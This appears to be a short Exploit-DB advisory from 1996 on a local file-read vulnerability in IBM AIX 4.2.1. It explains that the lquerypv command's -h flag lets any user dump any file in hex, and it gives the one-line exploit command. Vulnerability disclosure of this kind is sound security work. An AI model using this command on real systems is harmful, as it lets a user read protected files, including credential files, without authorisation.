IBM AIX 4.2.1 - 'lquerypv' File Read

EDB-ID:

19345


Author:

Aleph1

Type:

local


Platform:

AIX

Date:

1996-11-24


source: https://www.securityfocus.com/bid/455/info

There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format. 


/usr/sbin/lquerypv -h /pathtofilename